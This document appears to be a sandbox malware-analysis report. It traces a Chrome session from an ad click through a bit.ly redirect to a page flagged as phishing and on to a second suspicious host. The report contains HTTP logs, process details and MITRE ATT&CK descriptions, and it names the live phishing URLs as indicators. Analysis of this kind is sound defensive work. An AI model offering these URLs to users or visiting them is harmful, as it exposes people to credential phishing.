
Timestamp	kBytes transferred	Direction	Data
2023-11-14 19:34:14 UTC	7	IN	HTTP/1.1 302 Found P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Timing-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Location: ///bit.ly/46ePuds?gclid=CI_O7PidxIIDFc3NwgQduQkGNA&gclsrc=ds Content-Type: text/html; charset=UTF-8 X-Content-Type-Options: nosniff Date: Tue, 14 Nov 2023 19:34:14 GMT Server: cafe Content-Length: 0 X-XSS-Protection: 0 Set-Cookie: IDE=AHWqTUm42737J6WnAyqN81SSG7ziN8s9WQpFkltGyDdeQt2KDDp5UOWdNRWfkEdLhEA; expires=Thu, 13-Nov-2025 19:34:14 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none Set-Cookie: FLC=CI-39AEQ_a6VswEYrqugjgIotK7oAzC2l8-qBnAB2rgEETIPOg0KCygwmBe9_cE6mBkB; expires=Tue, 14-Nov-2023 19:34:24 GMT; path=/; domain=.doubleclick.net; Secure; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.5	49715	67.199.248.10	443	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-14 19:34:14 UTC	8	OUT	GET /46ePuds?gclid=CI_O7PidxIIDFc3NwgQduQkGNA&gclsrc=ds HTTP/1.1 Host: bit.ly Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	67.199.248.10	443	192.168.2.5	49715	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-14 19:34:15 UTC	9	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 14 Nov 2023 19:34:15 GMT Content-Type: text/html; charset=utf-8 Content-Length: 122 Cache-Control: private, max-age=90 Content-Security-Policy: referrer always; Location: https://www.roboticaeducativa.pe/za Referrer-Policy: unsafe-url Set-Cookie: _bit=naejyf-fa4570e237c36912ea-00w; Domain=bit.ly; Expires=Sun, 12 May 2024 19:34:15 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2023-11-14 19:34:15 UTC	9	IN	Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 42 69 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 6f 62 6f 74 69 63 61 65 64 75 63 61 74 69 76 61 2e 70 65 2f 7a 61 22 3e 6d 6f 76 65 64 20 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Bitly</title></head><body><a href="https://www.roboticaeducativa.pe/za">moved here</a></body></html>

Target ID:	0
Start time:	20:34:03
Start date:	14/11/2023
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	20:34:06
Start date:	14/11/2023
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2432 --field-trial-handle=2392,i,15757366758900780308,14817295041037776100,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	20:34:11
Start date:	14/11/2023
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Google\Chrome\Application\chrome.exe" "https://clickserve.dartsearch.net/link/click?lid=43700078497888010&ds_s_kwgid=58700008599075100&ds_a_cid=1402884687&ds_a_caid=20756460697&ds_a_agid=154005532286&ds_a_fiid=&ds_a_lid=kwd-21944266&ds_a_extid=&&ds_e_adid=680299733267&ds_e_matchtype=search&ds_e_device=c&ds_e_network=g&&ds_url_v=2&ds_dest_url=%2F%2F%2Fbit.ly%2F46ePuds#UjXUjrmYeT
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Source: https://www.roboticaeducativa.pe/za	Avira URL Cloud: Label: phishing
Source: https://www.roboticaeducativa.pe/za/	Avira URL Cloud: Label: phishing

Source: global traffic	HTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-117.0.5938.132Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /link/click?lid=43700078497888010&ds_s_kwgid=58700008599075100&ds_a_cid=1402884687&ds_a_caid=20756460697&ds_a_agid=154005532286&ds_a_fiid=&ds_a_lid=kwd-21944266&ds_a_extid=&&ds_e_adid=680299733267&ds_e_matchtype=search&ds_e_device=c&ds_e_network=g&&ds_url_v=2&ds_dest_url=%2F%2F%2Fbit.ly%2F46ePuds HTTP/1.1Host: clickserve.dartsearch.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ddm/clk/566760878;375740285;d;u=ds&sv1=78497888010&sv2=3399980907122207&sv3=1874347215042995942&sa_info=CJnpualNEJKxwJIBGM-k-ZwFIP7cx9u9BA==&gclid=CI_O7PidxIIDFc3NwgQduQkGNA;%3f///bit.ly/46ePuds?gclid=CI_O7PidxIIDFc3NwgQduQkGNA&gclsrc=ds HTTP/1.1Host: ad.doubleclick.netConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /46ePuds?gclid=CI_O7PidxIIDFc3NwgQduQkGNA&gclsrc=ds HTTP/1.1Host: bit.lyConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /za HTTP/1.1Host: www.roboticaeducativa.peConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /za/ HTTP/1.1Host: www.roboticaeducativa.peConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.roboticaeducativa.peConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.roboticaeducativa.pe/za/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /xeregry HTTP/1.1Host: elanexoartspace.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://www.roboticaeducativa.pe/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /xeregry/ HTTP/1.1Host: elanexoartspace.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://www.roboticaeducativa.pe/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=fDOAoSFWx5mmdg3&MD=gSpGkpwc HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=fDOAoSFWx5mmdg3&MD=gSpGkpwc HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.60.72.63
Source: unknown	TCP traffic detected without corresponding DNS query: 23.60.72.63
Source: unknown	TCP traffic detected without corresponding DNS query: 23.60.72.63
Source: unknown	TCP traffic detected without corresponding DNS query: 23.60.72.63
Source: unknown	TCP traffic detected without corresponding DNS query: 23.60.72.63
Source: unknown	TCP traffic detected without corresponding DNS query: 23.60.72.63
Source: unknown	TCP traffic detected without corresponding DNS query: 23.60.72.63
Source: unknown	TCP traffic detected without corresponding DNS query: 23.60.72.63
Source: unknown	TCP traffic detected without corresponding DNS query: 23.60.72.63
Source: unknown	TCP traffic detected without corresponding DNS query: 23.60.72.63
Source: unknown	TCP traffic detected without corresponding DNS query: 23.60.72.63
Source: unknown	TCP traffic detected without corresponding DNS query: 23.60.72.63
Source: unknown	TCP traffic detected without corresponding DNS query: 23.60.72.63
Source: unknown	TCP traffic detected without corresponding DNS query: 23.60.72.63
Source: unknown	TCP traffic detected without corresponding DNS query: 23.60.72.63
Source: unknown	TCP traffic detected without corresponding DNS query: 23.60.72.63
Source: unknown	TCP traffic detected without corresponding DNS query: 23.60.72.63
Source: unknown	TCP traffic detected without corresponding DNS query: 23.60.72.63
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103
Source: unknown	TCP traffic detected without corresponding DNS query: 40.127.169.103

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Boot Survival

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

(copy)

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

C:\Users\user\Downloads\7d5b7e5b-c7cc-4e66-827f-635d7cb0fae2.tmp

Chrome Cache Entry: 68

Static File Info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: chrome.exePID: 1632, Parent PID: 5424

General

Chronological Activities

Analysis Process: chrome.exePID: 4564, Parent PID: 1632

General

Chronological Activities

Analysis Process: chrome.exePID: 1876, Parent PID: 5424